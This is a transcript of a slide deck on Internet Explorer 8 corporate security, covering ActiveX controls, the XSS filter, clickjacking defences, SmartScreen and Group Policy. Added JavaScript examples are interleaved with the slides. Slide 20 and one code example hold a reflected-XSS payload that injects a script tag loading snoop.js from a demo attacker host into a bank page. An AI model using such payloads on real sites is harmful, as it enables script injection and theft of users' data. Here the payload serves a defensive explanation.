This document discusses Internet Explorer security and deployment strategies for Internet Explorer 8. It provides a brief history of Internet Explorer versions and their new security features. It then covers specific IE8 security enhancements like XSS filtering, clickjacking defenses, and SmartScreen filtering. The document also discusses centralized management using Group Policy and customizing IE8 deployment with IEAK. It concludes with recommendations for upgrading users and sites from older IE versions to IE8.
Corporate Security with IE8
1. Corporate Security with Internet Explorer 8
Alejandro Ponicke aponicke@microsoft.com
Juan Ladetto juanl@microsoft.com
2. Agenda
Evolution of Internet Explorer. History.
The browser as the entry point for the threats that swarm the Internet; responsible browsing. Cross-site scripting (XSS exploits), ClickJacking and SmartScreen filtering.
The best help from the least expected place: the power of Group Policies controlling IE.
Deployment optimization. Recommendations.
Extensibility: use case "IE for Kids". Introduction to IEAK. Uses.
3. Evolution of Internet Explorer
Internet Explorer 1 – 15 August 1995. Part of Microsoft Plus (Internet Jumpstart Kit in Plus!). Internet Explorer 1.5 came out a few months later and supports table rendering.
Internet Explorer 2 – 22 November 1995. Now supports SSL, cookies, VRML, newsgroups.
Internet Explorer 3 – 13 August 1996. Starts to become popular; the first browser to support CSS; Java and ActiveX controls are added; ships with other extras: mail and news, NetMeeting and Address Book (the Internet and browsers start to become a target for hackers).
Internet Explorer 4 – 17 September 1997. Adapts to the OS and now, with Windows Desktop Update, turns the Windows desktop into Active Desktop. Now supports Group Policy, Internet mail is Outlook Express, and it now also ships with MS Chat.
4. Evolution of Internet Explorer
Internet Explorer 5 – 18 March 1999. Included in Windows 98 SE; now supports bidirectional text, XML, XSLT, ruby characters, MHTML and, best of all, Ajax is born (XMLHttpRequest); last version for Mac and Unix.
IE 5.5 adds 128-bit SSL, improvements in printing, HTML and CSS compatible with standards.
6. Evolution of Internet Explorer
Internet Explorer 6 – 27 August 2001. Improvements in DHTML, inline frames, partial support for CSS 1, DOM 1 and SMIL 2.0, IEAK (it can now be customized). Support for this version ends in 2010.
Internet Explorer 7 – 18 October 2006. Improvements in web standards, tabbed browsing, search, anti-phishing filter and many more.
Internet Explorer 8 – 19 March 2009. Security, ease of access, standards, RSS, CSS and Ajax are the priority. Rendering engines (IE7).
Internet Explorer 9 - ???
8. Evolution & Change
Web 2.0 - significant benefits & challenges
Blended threats shifting from the browser
Decreasing consumer trust and confidence
Data Governance & Regulations
Privacy & User Preferences
Rapid pace of threat innovation
Organized Crime On The Rise
Chart of attacker motivation versus skill: motivations run from Curiosity and Personal Fame through Personal Gain to Thief / Organized International Crime and Spy Corp Data & National Interest; skill levels run from Script-Kiddy and Amateur through Vandal to Expert and Specialist.
10. Top Concerns
Top User Concerns: protection from intrusions; protection from harm; control on data / privacy.
Business Concerns: data governance / corporate IP; business interruption / productivity; impact to brand on consumer confidence.
11. Internet Explorer 8 Trustworthy Browsing
Build on a secure foundation (Browser Vulnerabilities): Security Development Lifecycle (SDL); Protected Mode; ActiveX Controls; DEP - Data Execution Prevention.
Extends browser protection to the web server (Web Server & Applications): HTTP-only cookies; Group Policies; XDomainRequest - Cross Domain Requests; XDM - Cross Domain Messaging; XSS Filter - Cross Site Scripting; ClickJacking Defense.
Confidently bank, communicate & shop (Social Engineering & Privacy): Extended Validation (EV) SSL Certificates; SmartScreen® Filter – Blocks Phishing & Malware; Domain Highlighting; Enhanced Delete Browsing History; InPrivate™ Browsing & Blocking.
Legend: IE 7, IE 8
13. Browser Vulnerabilities: ActiveX Hardening & Enhancements
Can it be used? Opt-in (IE7): is the control permitted to run in the browser without a prompt?
Exploit controls: ActiveX Killbits (IE5): has the control been flagged as unsafe?
Where? Per site (IE8): is the control permitted to run on this site?
14. Browser Vulnerabilities: ActiveX Hardening & Enhancements
Who? Per user: doesn't require elevating admin privileges. Doesn't require users to have admin privileges to install. Can be disabled through Group Policy.
16. Web Server & Applications: Secure data exchange
Cross Domain Communication
Same-Origin Policy: permits scripts running on pages originating from the same site to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites.
Workarounds can be dangerous & costly.
17. Web Server & Applications: Secure data exchange
Investments in securing Web 2.0
Cross Domain Request (XDomainRequest): enables web developers to more securely communicate between domains. Provides a mechanism to establish trust between domains through an explicit acknowledgement of cross-domain sharing, where both parties know which sites are sharing information. Proposed to the W3C for standardization.
Cross Document Messaging (XDM): enables two domains to establish a trust relationship to exchange object messages. Provides web developers a more secure mechanism to build cross-domain communication. Part of the HTML5 specification.
18. Web Server & Applications: XSS Exploits
The new buffer overflow: steal cookies & history; log keystrokes; deface sites; steal credentials; port-scan the Intranet; abuse browser/ActiveX vulnerabilities; evade phishing filters; circumvent HTTPS.
XSS Filter neuters the attack: blocks the malicious script from executing.
20. Web Server & Applications: Behind The Scenes…
Malicious URL in email contains encoded string: http://www.woodgrovebank.co.uk/woodgrovebank.asp?SID=%22%3E%3C%73%63%72...
Vulnerable application adds <script> tag to page: <script for=window event=onload src="http://hackersite.ie8demos.com/snoop.js"></script>
Generated signature: <SC{R}IPT¤src¤¤http¤¤¤hackersite¤ie8demos¤com¤snoop¤js¤>
Neutered script: <SC#IPT src=http://hackersite.ie8demos.com/snoop.js>
21. Web Server & Applications: ClickJacking
A type of Cross Site Request Forgery: entices users to click on content from another domain without the user realizing it.
An evolving server-side exploit. Impacts all browsers; only IE 8 has integrated protection capabilities.
Mitigation: add an X-FRAME-OPTIONS tag in the HTTP header. Deny all, or allow only from same-origin hosts.
26. Social Engineering & Privacy: EV SSL Certificates
Look for the green. Provides consumers added confidence and brands enhanced protection. Implemented by over 10,000 leading commerce, banking and transactional sites.
27. Social Engineering & Privacy: Domain Highlighting
Helps users more accurately ascertain the domain of the site they are visiting. The domain is black, vs. other characters which are gray.
28. Social Engineering & Privacy: SmartScreen™ Filter
Offering dynamic protection from phishing and malware.
30. User Choice & Control (Social Engineering & Privacy): Delete Browsing History; InPrivate Browsing; InPrivate Filtering.
31. Social Engineering & Privacy: Delete Browsing History
New option to delete browsing history while retaining favorites.
32. Social Engineering & Privacy: Third Party Content Serving
Over time, users' history and profiles can unknowingly be aggregated. Any third-party content can be used like a tracking cookie. There is little end-user notification or control today. Syndicated photos, weather, stocks, news articles; local analytics, etc. Unclear accountability with third-party security & privacy policies.
Diagram: the user visits unique sites (Tailspintoys.com, Woodgrovebank.com, Fabrikam.com, Southridge1-1.com, Litware-bulk.com, adventureworks.com, Northwind.com, Contoso.com, Prosware-sol.com), each of which pulls content from the same 3rd-party syndicator web server.
42. And now? Updating users and sites from IE6
Migrating is more than deploying a new version (but we need to take the step). The changes are not simple, but…
http://blogs.msdn.com/ie
http://msdn.com/ie
http://msdn.com/iecompat
http://technet.microsoft.com/en-us/ie/bb219517.aspx
Platform :: App :: User
Vuln expense – profit drives. As the platform layer has become more secure over the last five years, vulnerabilities become harder to find and more valuable. You need more skill to find these sorts of vulns, so vandals and script kiddies are forced out of that space and up the application stack to productivity and web applications, as well as social engineering attacks. Criminals are motivated by profit, not glory. Platform vulns are hard (and therefore expensive) to find when applications or configuration errors are easier to exploit.
FF3 released in June 2008. *28 of the 50 IE7 CVEs are duplicates. **30 CVEs impact FF2 and FF3 and are counted against both. CVE data is publicly available, and vendor neutral.
Users don't say "I'm worried about XSS". Users care that it works safely. They care about… Businesses think more about specific threats they have heard of/experienced, but what they REALLY care about is IP/data safety, meeting policy and regulations, and brand reputation.
We took this feedback, looked at the evolving layers of the security ecosystem & emerging threats, and addressed IE8 security features in a similarly layered fashion. Platform. App. User.
Hack the Platform!
Internet Explorer 8 provides for greater administrator management of ActiveX controls through per-user ActiveX and per-site ActiveX.
Per-User ActiveX
In Internet Explorer 8, per-user ActiveX makes it possible for standard users running on Windows Vista to install ActiveX controls in their own user profile, without requiring administrative privileges. This makes it easier for an organization to realize the full benefit of User Account Control by enabling standard users to install ActiveX controls that are used in their day-to-day browsing. In this way, if a user happens to install a malicious ActiveX control, the overall system will be unaffected, as the control was installed only under the user's account. Since installations can be restricted to a user profile, the risk and cost of compromise (and, in turn, the total cost of administering users on a machine) are lowered significantly.
As in Internet Explorer 7, when a webpage attempts to install a control, an Information Bar is displayed to the user. By clicking on the information bar, users can choose to either install the control machine-wide, or install it only for their own user account. The options in this menu will vary depending on the rights of the user (as managed with Group Policy settings for per-user ActiveX installations) and whether or not the control has been packaged to allow per-user installation. While this feature offers the possibility of lowering total cost of ownership, IT Administrators running managed environments also can elect to disable this feature via Group Policy.
Opt-in
IE8 also allows users to determine if an ActiveX control can be run on a site. This mechanism is called Opt-in and was present in IE7. It would appear as an information bar at the top of the browser before an ActiveX control was installed.
Per-Site ActiveX
When a user navigates to a Web site containing an ActiveX control, IE8 performs a number of checks, including a determination of where a control is permitted to run—a defense mechanism intended to help prevent malicious repurposing of controls. If a control is installed but is not permitted to run on a specific site, an Information Bar appears asking the user whether or not the control should be permitted to run on the current Web site or on all Web sites. IT administrators can use Group Policy to preset allowed controls and their associated domains.
ActiveX Killbits
Finally, site owners can prevent an ActiveX control from running in Internet Explorer by setting the kill bit so that the control is never called by Internet Explorer when default settings are used.
Hack the Application!
Thing is, we WANT to be able to mash up data and webby goodness. How do you protect against malicious scripts while enabling Web 2.0?
The XDR object introduces a gate and guards into the picture. Your site can use the XDR object to get data from other domains' servers in a safe and simple way. XDR is good for servers and pages.
IE sends the server your domain name so it can do security checks. It may want to block requests from most domains. IE also strips personal user data like cookies from outgoing requests so the user data isn't compromised. IE checks the server response to ensure the domain matches what you expect. The data is transferred as a text string instead, which you can use or parse.
We've also introduced another new feature to increase security for cross-domain communication. XDM is similar to XDR in that it is a safe and easy-to-use mechanism for cross-domain communication. However, XDM is used to transfer data between domains in different documents within the browser. For example, these documents can just be two frames in a single page or pages in different tabs. Both documents opt in to transferring data and then do so using postMessage().
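The two opt-in checks described above, as an added example that is not code from the deck or from Microsoft: on the XDR side, the server answers a cross-domain request (IE8 sends the caller's origin in the Origin header) only for trusted origins, and on the XDM side the receiving page checks event.origin before it touches event.data. The partner origins and the "balance" message shape are assumptions made for illustration.

```javascript
// Added example: server-side XDR origin check and client-side XDM handler.
// The trusted origins below are assumed partner sites, not real deployments.
const TRUSTED_ORIGINS = new Set([
  "https://www.woodgrovebank.co.uk",   // assumed partner site
  "https://www.tailspintoys.com"       // assumed partner site
]);

function isTrustedOrigin(origin) {
  return typeof origin === "string" && TRUSTED_ORIGINS.has(origin);
}

// XDR server side: response headers for a cross-domain request coming from
// `requestOrigin`. null means refuse; without Access-Control-Allow-Origin
// IE8 discards the response, so the data never reaches the other domain.
function xdrResponseHeaders(requestOrigin) {
  if (!isTrustedOrigin(requestOrigin)) return null;
  return {
    "Access-Control-Allow-Origin": requestOrigin,  // echo a trusted origin, never "*"
    "Content-Type": "text/plain"                   // XDR delivers text, not objects
  };
}

// XDM receiver: the payload is a text string, so validate its shape before
// using it; only a well-formed "balance" message is accepted.
function parseBalanceMessage(data) {
  if (typeof data !== "string") return null;
  let obj;
  try { obj = JSON.parse(data); } catch (e) { return null; }
  if (obj === null || typeof obj !== "object") return null;
  if (obj.type !== "balance" || typeof obj.amount !== "number") return null;
  return { type: "balance", amount: obj.amount };
}

// Handler for the window "message" event. Takes the event object so it can be
// exercised without a browser; returns the accepted message or null.
function handleMessage(event) {
  if (!isTrustedOrigin(event.origin)) return null;   // unknown frame: ignore it
  return parseBalanceMessage(event.data);
}

// XDM sender: name the target origin instead of "*" so the browser drops the
// message if the target frame has navigated somewhere else in the meantime.
function sendBalance(targetWindow, targetOrigin, amount) {
  if (!isTrustedOrigin(targetOrigin)) throw new Error("untrusted target origin");
  const payload = JSON.stringify({ type: "balance", amount });
  targetWindow.postMessage(payload, targetOrigin);
  return payload;
}

// Wire the handler up when running inside a browser page.
if (typeof window !== "undefined") {
  window.addEventListener("message", e => {
    const msg = handleMessage(e);
    if (msg) console.log("accepted balance", msg.amount);
  }, false);
}
```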
XSS exploits are relatively common, and an easy way for an attacker to deliver malicious content or steal user data. Web developers can make this harder for bad guys by doing proper input/output sanitization; even introducing length checks alone makes the attacker's life harder. -news content injection example- It would be great if all websites were developed securely and immune to this, but they aren't. So in IE8 we are introducing an XSS filter to protect against the most common type of XSS attack, the Type 1 or reflected attack. And my lovely assistant James is going to come demonstrate just how this works.
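The reflected-XSS check walked through on slide 20 and in the notes above, as an added example that is not the IE8 XSS Filter's own code: it looks for a script tag in the request's query string and, if that same text is echoed into the response, neuters it by altering the tag name (the slide shows <SC#IPT>), and contrasts this with output encoding on the server. The payload reuses the slide's demo URL; the vulnerable response page is constructed here.

```javascript
// Added example: a simplified reflected-XSS filter in the spirit of the IE8
// one, plus the server-side output encoding that makes the filter unnecessary.
function decodeParam(raw) {
  try { return decodeURIComponent(raw.replace(/\+/g, " ")); } catch (e) { return raw; }
}

// Percent-decoded values of every query-string parameter in the URL.
function queryValues(url) {
  const q = url.split("?")[1];
  if (!q) return [];
  return q.split("&").map(p => decodeParam(p.split("=").slice(1).join("=")));
}

// An opening <script ...> tag, attributes included, up to its closing '>'.
const SCRIPT_TAG = /<script\b[^>]*>/i;

// Returns { blocked, html }. Every script tag that came in via the query
// string and is reflected verbatim in the response is neutered in place.
function neuterReflectedScript(url, html) {
  let blocked = false;
  for (const value of queryValues(url)) {
    const m = value.match(SCRIPT_TAG);
    if (!m) continue;
    const injected = m[0];
    if (!html.includes(injected)) continue;          // not reflected: nothing to do
    const neutered = injected.replace(/^(<sc)r/i, "$1#");  // <script -> <sc#ipt
    html = html.split(injected).join(neutered);
    blocked = true;
  }
  return { blocked, html };
}

// The real fix belongs on the server: encoded output can never become markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Constructed vulnerable response: echoes the SID parameter unencoded.
function vulnerableResponse(url) {
  const sid = queryValues(url)[0] || "";
  return '<html><body><input value="' + sid + '"></body></html>';
}

// Demo URL from the slide; the SID payload closes the attribute and injects a tag.
const DEMO_URL = "http://www.woodgrovebank.co.uk/woodgrovebank.asp?SID=" +
  encodeURIComponent('"><script for=window event=onload src="http://hackersite.ie8demos.com/snoop.js"></script>');
```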
KPrice
ONE MORE TIME!!! Just in case the demo $DEITY was not favoring us today…
The SmartScreen Filter now includes a new security feature designed to help detect and prevent "ClickJacking". This feature is always enabled and cannot be disabled.
ClickJacking is an attack whereby an attacker's web page entices the user to click on content delivered from another domain (or from a native security prompt) without the user realizing it. ClickJacking renders most anti-CSRF (cross site request forgery) mitigations defenseless, and can be used to reconfigure certain browser add-ons in unsafe ways. Attackers show a set of dummy buttons, then load another page over it in a transparent layer. The user thinks he or she is clicking the visible buttons, while actually performing actions on the hidden page. The hidden page may be an authentic page, so attackers can trick users into performing actions they never intended, and there is no way of tracing such actions later, as the user was genuinely authenticated on the other page.
Microsoft is working with the browser community to support this solution and instruct all sites to include the tag on every page on their site.
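The X-FRAME-OPTIONS defense from slide 21 and the notes above, as an added example that is neither IE8's nor any site's code: the browser-side decision (DENY, or SAMEORIGIN allowing only same-origin framers) and a small server-side wrapper that stamps the header on every page, which is what the notes ask sites to do. The origins and the response object are constructed for illustration.

```javascript
// Added example: X-Frame-Options as a browser would enforce it, plus a
// handler wrapper that adds the header to every response a site serves.
function parseFrameOptions(headerValue) {
  if (typeof headerValue !== "string") return null;
  const v = headerValue.trim().toUpperCase();
  return v === "DENY" || v === "SAMEORIGIN" ? v : null;  // unknown value: no protection
}

// May a document served with `headerValue` at `pageOrigin` be embedded by a
// frame whose top-level document lives at `framerOrigin`?
function mayBeFramed(headerValue, pageOrigin, framerOrigin) {
  const policy = parseFrameOptions(headerValue);
  if (policy === null) return true;       // no header: the page frames freely
  if (policy === "DENY") return false;    // never framed, not even by itself
  return pageOrigin === framerOrigin;     // SAMEORIGIN
}

// Wrap a request handler so the header reaches every page, not just the
// sensitive ones; an unrecognised policy string fails closed to DENY.
function withFrameOptions(handler, policy) {
  const value = parseFrameOptions(policy) || "DENY";
  return function (req, res) {
    res.setHeader("X-Frame-Options", value);
    return handler(req, res);
  };
}

// Constructed stand-in for a server response object, enough to run offline.
function fakeResponse() {
  const headers = {};
  return { headers, setHeader: (k, v) => { headers[k] = v; }, end: () => {} };
}
```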
Hack the User!
Ultimately we want to help users make safe, responsible choices without having to be a security expert, and give them confidence in their safety online.
Brand enhancing, to build user confidence; also user education/reinforcement. If the cert is bad, the browser gives a warning page and recommends not continuing to the site.
Emerging threat vectors & diversification. Need to help address the needs & concerns of users, businesses, brands and site owners.
SmartScreen® Filter: integrated phishing & malware download protection. Examines the URL string, preempting evolving threats. Blocks 1 million+ weekly phishing attempts (IE7 & IE8). Significant malware site detection volumes, ~10 x the traffic as compared to phishing (IE8 beta users). Blocking 1,000's of new phishing sites daily. Group Policy support – key IT requirement. 24 x 7 support processes and feedback mechanisms.